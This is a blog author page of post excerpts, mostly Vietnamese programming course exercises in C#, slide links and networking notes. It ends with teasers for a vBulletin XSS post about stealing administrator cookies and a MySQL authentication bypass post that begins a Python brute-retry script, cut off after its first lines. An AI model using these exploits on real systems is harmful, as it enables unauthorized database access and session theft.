Author: Nam Le

  • Code to FlowChart – phần mềm chuyển Code sang lưu đồ thuật toán

    The best way to solve this problem is to create flowchart from the piece of open source directly. The flowchart will tell you how the piece of open source takes effect in your project. By using our Code to FlowChart Converter, you can clearly view the open source flowchart in seconds, with no manual drawing…

  • Bài thực hành 1 môn Phân tích thiết kế HTTT: Quản lý tồn kho

  • Bài thực hành 1 môn Lập trình trên môi trường Windows

    [codes=c#]using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.Threading.Tasks; namespace th1{    class Program    {        static void c1()        {            Console.Write(“Nhap vao ho va ten: “);            string hoten = Console.ReadLine();            Console.Write(“Nhap vao tuoi: “);            int tuoi = Convert.ToInt32(Console.ReadLine());            Console.Write(“Nhap vao gioi tinh: “);            string gioitinh = Console.ReadLine();            Console.Write(“Nhap vao so thik: “);            string sothik = Console.ReadLine();            Console.WriteLine(“Ten la: ” + hoten + “\tTuoi la ” + tuoi + “\tGioi tinh la ” +…

  • Slide C# – Lập trình quản lý

    http://www.mediafire.com/view/?vfohn8y984ocg4s

  • Ví dụ mẫu môn Lập trình quản lí – tuần 3

    Mảng và vòng lặp: [codes=c#]using System;using System.Collections.Generic;using System.Linq;using System.Text; namespace Buoi2_ArrayLoop{    class Program    {        static void Main(string[] args)        {            const int max =5;            int[] m = new int[max];            //Nhap du lieu cho mang           for(int i=0; i

  • Ví dụ mẫu môn Lập trình quản lí – tuần 2

    [codes=c#]using System;using System.Collections.Generic;using System.Linq;using System.Text; namespace B1_E1{    class Program    {        static void Main(string[] args)        {            Console.WriteLine(“Xin chao den voi khoa hoc Lap Trinh Quan Ly”);            Console.Write(“Ban ten gi”);            string s = Console.ReadLine();            Console.Write(“Ban bao nhieu tuoi”);            string s1 = Console.ReadLine();            int tuoi = Convert.ToInt32(s1);            Console.WriteLine(“Chao ban {0} {1} tuoi”,s,tuoi);            Console.ReadLine();        }    }}[/codes] [codes=c#]using System;using System.Collections.Generic;using System.Linq;using System.Text; namespace B1_RefP{    class Program    {        static void Main(string[] args)        {            int a=8,b=0,y;            Console.WriteLine(“Hoan vi hai so:”);            Console.WriteLine(“a={0}\nb={1}\n thanh:”, a,…

  • CSMA/CA, Frame ACK

    CSMA/CA là gì. Vì sao cần phải sử dụng giao thức này? CSMA/CA CSMA/CA (Carrier Sense Multiple Access/Collision Avoidance) là cơ chế đa truy cập tránh xung đột  thuộc tầng vật lý kiểm soát phương thức truy cập được sử dụng trong IEEE 802.11 (Wi Fi) mạng LAN không dây. -CSMA/CA tránh xung đột (CSMA/CD…

  • Slide bài giảng và Thực hành môn Lập trình trên môi trường Windows

    http://www.mediafire.com/download.php?nabg54n61mbp13o (Ko like rớt môn này ráng chịu. 3 chỉ lận đó.login để like [emot]uplook[/emot])

  • Slide bai giang PTTKHT_moi.ppt của thầy Văn Như Bích

    Slide bai giang PTTKHT_moi.ppt http://www.mediafire.com/view/?6hmnbzp482wa2wl (Ko like rớt môn này ráng chịu. 3 chỉ lận đó.login để like [emot]hamarneh[/emot])

  • Tài liệu mạng không dây của thầy Nguyễn Hoàng Nam – hutech

    — part 1 ——————————————————————————————————–DHCP-B3.pptxHe dieu hanh mang-B2.pptMẠNG MÁY TÍNH-B2.pptxOSI-B3.pptTCP-IP-B4.pptThiết bị mạng-B1.pptDNS-B4wireshark.doc http://www.mediafire.com/download.php?ysvjmw6m1mfsizg wireshark:http://www.wireshark.org/download.html How a Computer Network Works.flvhttp://www.youtube.com/watch?v=H760U3QZocs [youtube=450,300]http://www.youtube.com/watch?v=H760U3QZocs[/youtube] Learning Network Protocols.flvhttp://www.youtube.com/watch?v=-2J7nnIfXJM [youtube=450,300]http://www.youtube.com/watch?v=-2J7nnIfXJM[/youtube] — part 2 ——————————————————————————————————– DNS Cache Poisoning Attack.avihttp://www.youtube.com/watch?v=1d1tUefYn4U [youtube=500,400]http://www.youtube.com/watch?v=1d1tUefYn4U[/youtube] DNS & DHCP: pass giải nén cth01n2 http://www.mediafire.com/?77y4tnc7i00t845 — part 3 ——————————————————————————————————– Wireless lab + document:1- File sample wireshark: wireshark-traces.zip 2- Tai lieu…

  • vBulletin 4.2.0 XSS Vulnerability

    1.vBulletin Description: Content publishing, search, security, and more— vBulletin has it all. Whether it’s available features, support, or ease-of-use, vBulletin offers the most for your money. Learn more about what makes vBulletin the choice for people who are serious about creating thriving online communities. 2. Vulnerability Description: To steal cookie from administrator or any member…

  • Massive MYSQL Authentication Bypass Exploit

    There has been a new MYSQL authentication bypass exploit released on seclist here: . It is absolutely trivial to gain root access to a MySQL database at this point. Thanks to jduck for the tweet bringing this to our attention. Easy python script to gain root access to MySQL: #!/usr/bin/python import subprocess  while 1:         subprocess.Popen("mysql -u…